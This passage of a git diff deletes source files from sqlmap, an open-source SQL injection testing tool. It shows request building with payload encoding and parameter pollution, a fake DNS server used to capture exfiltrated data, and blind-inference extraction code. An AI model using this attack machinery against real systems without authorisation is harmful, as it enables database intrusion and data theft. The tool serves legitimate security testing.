else: - # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded - if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode: - payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below - value = agent.replacePayload(value, payload) - - if conf.hpp: - if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): - warnMsg = "HTTP parameter pollution should work only against " - warnMsg += "ASP(.NET) targets" - singleTimeWarnMessage(warnMsg) - if place in (PLACE.GET, PLACE.POST): - _ = re.escape(PAYLOAD_DELIMITER) - match = re.search("(?P\w+)=%s(?P.+?)%s" % (_, _), value) - if match: - payload = match.group("value") - - for splitter in (urlencode(' '), ' '): - if splitter in payload: - prefix, suffix = ("*/", "/*") if splitter == ' ' else (urlencode(_) for _ in ("*/", "/*")) - parts = payload.split(splitter) - parts[0] = "%s%s" % (parts[0], suffix) - parts[-1] = "%s%s=%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1]) - for i in xrange(1, len(parts) - 1): - parts[i] = "%s%s=%s%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix) - payload = "".join(parts) - - for splitter in (urlencode(','), ','): - payload = payload.replace(splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name"))) - - value = agent.replacePayload(value, payload) - else: - warnMsg = "HTTP parameter pollution works only with regular " - warnMsg += "GET and POST parameters" - singleTimeWarnMessage(warnMsg) - - if place: - value = agent.removePayloadDelimiters(value) - - if PLACE.GET in conf.parameters: - get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value - - if PLACE.POST in conf.parameters: - post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value - - if PLACE.CUSTOM_POST in conf.parameters: - post = 
conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value - post = post.replace(ASTERISK_MARKER, '*') if post else post - - if PLACE.COOKIE in conf.parameters: - cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value - - if PLACE.USER_AGENT in conf.parameters: - ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value - - if PLACE.REFERER in conf.parameters: - referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value - - if PLACE.HOST in conf.parameters: - host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value - - if PLACE.URI in conf.parameters: - uri = conf.url if place != PLACE.URI or not value else value - else: - uri = conf.url - - if value and place == PLACE.CUSTOM_HEADER: - auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] - - if conf.csrfToken: - def _adjustParameter(paramString, parameter, newValue): - retVal = paramString - match = re.search("%s=(?P[^&]*)" % re.escape(parameter), paramString) - if match: - retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString) - return retVal - - page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST)) - match = re.search(r"]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "") - token = (match.group(2) or match.group(3) or match.group(4)) if match else None - - if not token: - if conf.csrfUrl != conf.url and code == httplib.OK: - if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): - token = page 
- - if not token and conf.cj and any(_.name == conf.csrfToken for _ in conf.cj): - for _ in conf.cj: - if _.name == conf.csrfToken: - token = _.value - if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): - if post: - post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token) - elif get: - get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token) - else: - get = "%s=%s" % (conf.csrfToken, token) - break - - if not token: - errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url) - if not conf.csrfUrl: - errMsg += ". You can try to rerun by providing " - errMsg += "a valid value for option '--csrf-url'" - raise SqlmapTokenException, errMsg - - if token: - for place in (PLACE.GET, PLACE.POST): - if place in conf.parameters: - if place == PLACE.GET and get: - get = _adjustParameter(get, conf.csrfToken, token) - elif place == PLACE.POST and post: - post = _adjustParameter(post, conf.csrfToken, token) - - for i in xrange(len(conf.httpHeaders)): - if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower(): - conf.httpHeaders[i] = (conf.httpHeaders[i][0], token) - - if conf.rParam: - def _randomizeParameter(paramString, randomParameter): - retVal = paramString - match = re.search(r"(\A|\b)%s=(?P[^&;]+)" % re.escape(randomParameter), paramString) - if match: - origValue = match.group("value") - retVal = re.sub(r"(\A|\b)%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) - return retVal - - for randomParameter in conf.rParam: - for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI, PLACE.CUSTOM_POST): - if item in conf.parameters: - if item == PLACE.GET and get: - get = _randomizeParameter(get, randomParameter) - elif item in (PLACE.POST, PLACE.CUSTOM_POST) and post: - post = _randomizeParameter(post, randomParameter) - elif 
item == PLACE.COOKIE and cookie: - cookie = _randomizeParameter(cookie, randomParameter) - elif item == PLACE.URI and uri: - uri = _randomizeParameter(uri, randomParameter) - - if conf.evalCode: - delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER - variables = {"uri": uri, "lastPage": threadData.lastPage, "_locals": locals()} - originals = {} - keywords = keyword.kwlist - - if not get and PLACE.URI in conf.parameters: - query = urlparse.urlsplit(uri).query or "" - else: - query = None - - for item in filter(None, (get, post if not kb.postHint else None, query)): - for part in item.split(delimiter): - if '=' in part: - name, value = part.split('=', 1) - name = re.sub(r"[^\w]", "", name.strip()) - if name in keywords: - name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX) - value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus)) - variables[name] = value - - if cookie: - for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER): - if '=' in part: - name, value = part.split('=', 1) - name = re.sub(r"[^\w]", "", name.strip()) - if name in keywords: - name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX) - value = urldecode(value, convall=True) - variables[name] = value - - while True: - try: - compiler.parse(conf.evalCode.replace(';', '\n')) - except SyntaxError, ex: - original = replacement = ex.text.strip() - for _ in re.findall(r"[A-Za-z_]+", original)[::-1]: - if _ in keywords: - replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX)) - break - if original == replacement: - conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "") - break - else: - conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement) - else: - break - - originals.update(variables) - evaluateCode(conf.evalCode, variables) - - for variable in variables.keys(): - if variable.endswith(EVALCODE_KEYWORD_SUFFIX): - value = variables[variable] - del variables[variable] - variables[variable.replace(EVALCODE_KEYWORD_SUFFIX, "")] 
= value - - uri = variables["uri"] - - for name, value in variables.items(): - if name != "__builtins__" and originals.get(name, "") != value: - if isinstance(value, (basestring, int)): - found = False - value = getUnicode(value) - - regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter)) - if re.search(regex, (get or "")): - found = True - get = re.sub(regex, "\g<1>%s\g<3>" % value, get) - - if re.search(regex, (post or "")): - found = True - post = re.sub(regex, "\g<1>%s\g<3>" % value, post) - - if re.search(regex, (query or "")): - found = True - uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value, uri) - - regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)) - if re.search(regex, (cookie or "")): - found = True - cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie) - - if not found: - if post is not None: - post += "%s%s=%s" % (delimiter, name, value) - elif get is not None: - get += "%s%s=%s" % (delimiter, name, value) - elif cookie is not None: - cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value) - - if not conf.skipUrlEncode: - get = urlencode(get, limit=True) - - if post is not None: - if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): - post = getattr(post, UNENCODED_ORIGINAL_VALUE) - elif kb.postUrlEncode: - post = urlencode(post, spaceplus=kb.postSpaceToPlus) - - if timeBasedCompare: - if len(kb.responseTimes.get(kb.responseTimeMode, [])) < MIN_TIME_RESPONSES: - clearConsoleLine() - - kb.responseTimes.setdefault(kb.responseTimeMode, []) - - if conf.tor: - warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " - warnMsg += "time-based injections because of its high latency time" - singleTimeWarnMessage(warnMsg) - - warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if 
kb.responseTimeMode else "") - warnMsg += "larger statistical model, please wait" - dataToStdout(warnMsg) - - while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: - value = kb.responseTimePayload.replace(RANDOM_INTEGER_MARKER, str(randomInt(6))).replace(RANDOM_STRING_MARKER, randomStr()) if kb.responseTimePayload else kb.responseTimePayload - Connect.queryPage(value=value, content=True, raise404=False) - dataToStdout('.') - - dataToStdout(" (done)\n") - - elif not kb.testMode: - warnMsg = "it is very important to not stress the network adapter " - warnMsg += "during usage of time-based payloads to prevent potential " - warnMsg += "disruptions " - singleTimeWarnMessage(warnMsg) - - if not kb.laggingChecked: - kb.laggingChecked = True - - deviation = stdev(kb.responseTimes[kb.responseTimeMode]) - - if deviation > WARN_TIME_STDEV: - kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE - - warnMsg = "considerable lagging has been detected " - warnMsg += "in connection response(s). Please use as high " - warnMsg += "value for option '--time-sec' as possible (e.g. 
" - warnMsg += "10 or more)" - logger.critical(warnMsg) - - if conf.safeFreq > 0: - kb.queryCounter += 1 - if kb.queryCounter % conf.safeFreq == 0: - if conf.safeUrl: - Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) - elif kb.safeReq: - Connect.getPage(url=kb.safeReq.url, post=kb.safeReq.post, method=kb.safeReq.method, auxHeaders=kb.safeReq.headers) - - start = time.time() - - if kb.nullConnection and not content and not response and not timeBasedCompare: - noteResponseTime = False - - try: - pushValue(kb.pageCompress) - kb.pageCompress = False - - if kb.nullConnection == NULLCONNECTION.HEAD: - method = HTTPMETHOD.HEAD - elif kb.nullConnection == NULLCONNECTION.RANGE: - auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" - - _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) - - if headers: - if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): - pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) - elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): - pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) - finally: - kb.pageCompress = popValue() - - if not pageLength: - try: - page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) - except MemoryError: - page, headers, code = None, None, None - warnMsg = "site returned insanely large response" - if kb.testMode: - warnMsg += " in testing phase. 
This is a common " - warnMsg += "behavior in custom WAF/IDS/IPS solutions" - singleTimeWarnMessage(warnMsg) - - if conf.secondOrder: - page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) - - threadData.lastQueryDuration = calculateDeltaSeconds(start) - threadData.lastPage = page - - kb.originalCode = kb.originalCode or code - - if kb.testMode: - kb.testQueryCount += 1 - - if timeBasedCompare: - return wasLastResponseDelayed() - elif noteResponseTime: - kb.responseTimes.setdefault(kb.responseTimeMode, []) - kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration) - - if not response and removeReflection: - page = removeReflectiveValues(page, payload) - - kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None - kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None - - if content or response: - return page, headers - - if getRatioValue: - return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) - else: - return comparison(page, headers, code, getRatioValue, pageLength) - -def setHTTPHandlers(): # Cross-linked function - raise NotImplementedError diff --git a/lib/request/direct.py b/lib/request/direct.py deleted file mode 100644 index 8e2889f8..00000000 --- a/lib/request/direct.py +++ /dev/null @@ -1,73 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import time - -from extra.safe2bin.safe2bin import safecharencode -from lib.core.agent import agent -from lib.core.common import Backend -from lib.core.common import calculateDeltaSeconds -from lib.core.common import extractExpectedValue -from lib.core.common import 
getCurrentThreadData -from lib.core.common import getUnicode -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import isListLike -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.dicts import SQL_STATEMENTS -from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import DBMS -from lib.core.enums import EXPECTED -from lib.core.settings import UNICODE_ENCODING -from lib.utils.timeout import timeout - -def direct(query, content=True): - select = True - query = agent.payloadDirect(query) - query = agent.adjustLateValues(query) - threadData = getCurrentThreadData() - - if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith("SELECT ") and " FROM " not in query.upper(): - query = "%s FROM DUAL" % query - - for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): - for sqlStatement in sqlStatements: - if query.lower().startswith(sqlStatement) and sqlTitle != "SQL SELECT statement": - select = False - break - - if select and not query.upper().startswith("SELECT "): - query = "SELECT %s" % query - - logger.log(CUSTOM_LOGGING.PAYLOAD, query) - - output = hashDBRetrieve(query, True, True) - start = time.time() - - if not select and "EXEC " not in query.upper(): - _ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) - elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query): - output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) - hashDBWrite(query, output, True) - elif output: - infoMsg = "resumed: %s..." 
% getUnicode(output, UNICODE_ENCODING)[:20] - logger.info(infoMsg) - threadData.lastQueryDuration = calculateDeltaSeconds(start) - - if not output: - return output - elif content: - if output and isListLike(output): - if len(output[0]) == 1: - output = [_[0] for _ in output] - - retVal = getUnicode(output, noneToNull=True) - return safecharencode(retVal) if kb.safeCharEncode else retVal - else: - return extractExpectedValue(output, EXPECTED.BOOL) diff --git a/lib/request/dns.py b/lib/request/dns.py deleted file mode 100644 index b619fbdf..00000000 --- a/lib/request/dns.py +++ /dev/null @@ -1,158 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re -import socket -import threading -import time - -class DNSQuery(object): - """ - Used for making fake DNS resolution responses based on received - raw request - - Reference(s): - http://code.activestate.com/recipes/491264-mini-fake-dns-server/ - https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py - """ - - def __init__(self, raw): - self._raw = raw - self._query = "" - - type_ = (ord(raw[2]) >> 3) & 15 # Opcode bits - - if type_ == 0: # Standard query - i = 12 - j = ord(raw[i]) - - while j != 0: - self._query += raw[i + 1:i + j + 1] + '.' 
- i = i + j + 1 - j = ord(raw[i]) - - def response(self, resolution): - """ - Crafts raw DNS resolution response packet - """ - - retVal = "" - - if self._query: - retVal += self._raw[:2] # Transaction ID - retVal += "\x85\x80" # Flags (Standard query response, No error) - retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00" # Questions and Answers Counts - retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)] # Original Domain Name Query - retVal += "\xc0\x0c" # Pointer to domain name - retVal += "\x00\x01" # Type A - retVal += "\x00\x01" # Class IN - retVal += "\x00\x00\x00\x20" # TTL (32 seconds) - retVal += "\x00\x04" # Data length - retVal += "".join(chr(int(_)) for _ in resolution.split('.')) # 4 bytes of IP - - return retVal - -class DNSServer(object): - def __init__(self): - self._check_localhost() - self._requests = [] - self._lock = threading.Lock() - self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - self._socket.bind(("", 53)) - self._running = False - self._initialized = False - - def _check_localhost(self): - response = "" - try: - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect(("", 53)) - s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex")) # A www.google.com - response = s.recv(512) - except: - pass - finally: - if response and "google" in response: - raise socket.error("another DNS service already running on *:53") - - def pop(self, prefix=None, suffix=None): - """ - Returns received DNS resolution request (if any) that has given - prefix/suffix combination (e.g. 
prefix..suffix.domain) - """ - - retVal = None - - with self._lock: - for _ in self._requests: - if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I): - retVal = _ - self._requests.remove(_) - break - - return retVal - - def run(self): - """ - Runs a DNSServer instance as a daemon thread (killed by program exit) - """ - - def _(): - try: - self._running = True - self._initialized = True - - while True: - data, addr = self._socket.recvfrom(1024) - _ = DNSQuery(data) - self._socket.sendto(_.response("127.0.0.1"), addr) - - with self._lock: - self._requests.append(_._query) - - except KeyboardInterrupt: - raise - - finally: - self._running = False - - thread = threading.Thread(target=_) - thread.daemon = True - thread.start() - -if __name__ == "__main__": - server = None - try: - server = DNSServer() - server.run() - - while not server._initialized: - time.sleep(0.1) - - while server._running: - while True: - _ = server.pop() - - if _ is None: - break - else: - print "[i] %s" % _ - - time.sleep(1) - - except socket.error, ex: - if 'Permission' in str(ex): - print "[x] Please run with sudo/Administrator privileges" - else: - raise - except KeyboardInterrupt: - os._exit(0) - finally: - if server: - server._running = False diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py deleted file mode 100644 index 952f7fc0..00000000 --- a/lib/request/httpshandler.py +++ /dev/null @@ -1,104 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import distutils.version -import httplib -import socket -import urllib2 - -from lib.core.common import getSafeExString -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from lib.core.settings import PYVERSION - -ssl = None -try: - import ssl as _ssl - ssl = _ssl -except ImportError: - pass - -_protocols = 
filter(None, (getattr(ssl, _, None) for _ in ("PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2"))) - -class HTTPSConnection(httplib.HTTPSConnection): - """ - Connection class that enables usage of newer SSL protocols. - - Reference: http://bugs.python.org/msg128686 - """ - - def __init__(self, *args, **kwargs): - httplib.HTTPSConnection.__init__(self, *args, **kwargs) - - def connect(self): - def create_sock(): - sock = socket.create_connection((self.host, self.port), self.timeout) - if getattr(self, "_tunnel_host", None): - self.sock = sock - self._tunnel() - return sock - - success = False - - # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext - # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni - if kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"): - for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols): - try: - sock = create_sock() - context = ssl.SSLContext(protocol) - _ = context.wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host) - if _: - success = True - self.sock = _ - _protocols.remove(protocol) - _protocols.insert(0, protocol) - break - else: - sock.close() - except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: - self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex)) - - if kb.tlsSNI.get(self.host) is None: - kb.tlsSNI[self.host] = success - - if not success: - for protocol in _protocols: - try: - sock = create_sock() - _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol) - if _: - success = True - self.sock = _ - _protocols.remove(protocol) - _protocols.insert(0, protocol) - break - else: - sock.close() - except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: - self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex)) - - if not success: - errMsg = "can't establish SSL 
connection" - if distutils.version.LooseVersion(PYVERSION) < distutils.version.LooseVersion("2.7.10"): - errMsg += " (please retry with Python >= 2.7.10)" - raise SqlmapConnectionException(errMsg) - -class HTTPSHandler(urllib2.HTTPSHandler): - def https_open(self, req): - return self.do_open(HTTPSConnection if ssl else httplib.HTTPSConnection, req) - -# Bug fix (http://bugs.python.org/issue17849) - -def _(self, *args): - return self._readline() - -httplib.LineAndFileWrapper._readline = httplib.LineAndFileWrapper.readline -httplib.LineAndFileWrapper.readline = _ diff --git a/lib/request/inject.py b/lib/request/inject.py deleted file mode 100644 index bd83287b..00000000 --- a/lib/request/inject.py +++ /dev/null @@ -1,492 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re -import time - -from lib.core.agent import agent -from lib.core.bigarray import BigArray -from lib.core.common import Backend -from lib.core.common import calculateDeltaSeconds -from lib.core.common import cleanQuery -from lib.core.common import expandAsteriskForColumns -from lib.core.common import extractExpectedValue -from lib.core.common import getPublicTypeMembers -from lib.core.common import getTechniqueData -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import initTechnique -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import parseUnionPage -from lib.core.common import popValue -from lib.core.common import pushValue -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import singleTimeWarnMessage -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.dicts import 
FROM_DUMMY_TABLE -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import DBMS -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapDataException -from lib.core.exception import SqlmapNotVulnerableException -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import MAX_TECHNIQUES_PER_VALUE -from lib.core.settings import SQL_SCALAR_REGEX -from lib.core.threads import getCurrentThreadData -from lib.request.connect import Connect as Request -from lib.request.direct import direct -from lib.techniques.blind.inference import bisection -from lib.techniques.blind.inference import queryOutputLength -from lib.techniques.dns.test import dnsTest -from lib.techniques.dns.use import dnsUse -from lib.techniques.error.use import errorUse -from lib.techniques.union.use import unionUse - -def _goDns(payload, expression): - value = None - - if conf.dnsName and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None: - if kb.dnsTest is None: - dnsTest(payload) - - if kb.dnsTest: - value = dnsUse(payload, expression) - - return value - -def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar=None, dump=False, field=None): - start = time.time() - value = None - count = 0 - - value = _goDns(payload, expression) - - if value is not None: - return value - - timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) - - if not (timeBasedCompare and kb.dnsTest): - if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not (timeBasedCompare and not conf.forceThreads): - - if field and re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I): - expression = "SELECT %s FROM (%s)" % (field, expression) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - expression += " AS 
%s" % randomStr(lowercase=True, seed=hash(expression)) - - if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields.split(','): - nulledCastedField = agent.nullAndCastField(field) - injExpression = expression.replace(field, nulledCastedField, 1) - else: - injExpression = expression - length = queryOutputLength(injExpression, payload) - else: - length = None - - kb.inferenceMode = True - count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump) - kb.inferenceMode = False - - if not kb.bruteMode: - debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) - logger.debug(debugMsg) - - return value - -def _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=None, charsetType=None, firstChar=None, lastChar=None, dump=False): - outputs = [] - origExpr = None - - for field in expressionFieldsList: - output = None - - if field.startswith("ROWNUM "): - continue - - if isinstance(num, int): - origExpr = expression - expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) - - if "ROWNUM" in expressionFieldsList: - expressionReplaced = expression - else: - expressionReplaced = expression.replace(expressionFields, field, 1) - - output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field) - - if isinstance(num, int): - expression = origExpr - - outputs.append(output) - - return outputs - -def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False): - """ - Retrieve the output of a SQL query characted by character taking - advantage of an blind SQL injection vulnerability on the affected - parameter through a bisection algorithm. 
- """ - - initTechnique(kb.technique) - - query = agent.prefixQuery(kb.injection.data[kb.technique].vector) - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - count = None - startLimit = 0 - stopLimit = None - outputs = BigArray() - - if not unpack: - return _goInference(payload, expression, charsetType, firstChar, lastChar, dump) - - _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) - - rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) - if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD): - expressionFieldsList = [expressionFields] - - if len(expressionFieldsList) > 1: - infoMsg = "the SQL query provided has more than one field. " - infoMsg += "sqlmap will now unpack it into distinct queries " - infoMsg += "to be able to retrieve the output even if we " - infoMsg += "are going blind" - logger.info(infoMsg) - - # If we have been here from SQL query/shell we have to check if - # the SQL query might return multiple entries and in such case - # forge the SQL limiting the query output one entry at a time - # NOTE: we assume that only queries that get data from a table - # can return multiple entries - if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ - not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ - expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): - expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) - - if limitCond: - test = True - - if not stopLimit or stopLimit <= 1: - if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]): - test = False - - if test: - # Count the number of SQL query entries output - countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] - countedExpression = 
expression.replace(expressionFields, countFirstField, 1) - - if " ORDER BY " in countedExpression.upper(): - _ = countedExpression.upper().rindex(" ORDER BY ") - countedExpression = countedExpression[:_] - - if not stopLimit: - count = _goInference(payload, countedExpression, charsetType=CHARSET_TYPE.DIGITS, firstChar=firstChar, lastChar=lastChar) - - if isNumPosStrValue(count): - count = int(count) - - if batch or count == 1: - stopLimit = count - else: - message = "the SQL query provided can return " - message += "%d entries. How many " % count - message += "entries do you want to retrieve?\n" - message += "[a] All (default)\n[#] Specific number\n" - message += "[q] Quit" - test = readInput(message, default="a") - - if not test or test[0] in ("a", "A"): - stopLimit = count - - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - - elif test.isdigit() and int(test) > 0 and int(test) <= count: - stopLimit = int(test) - - infoMsg = "sqlmap is now going to retrieve the " - infoMsg += "first %d query output entries" % stopLimit - logger.info(infoMsg) - - elif test[0] in ("#", "s", "S"): - message = "how many? " - stopLimit = readInput(message, default="10") - - if not stopLimit.isdigit(): - errMsg = "invalid choice" - logger.error(errMsg) - - return None - - else: - stopLimit = int(stopLimit) - - else: - errMsg = "invalid choice" - logger.error(errMsg) - - return None - - elif count and not count.isdigit(): - warnMsg = "it was not possible to count the number " - warnMsg += "of entries for the SQL query provided. 
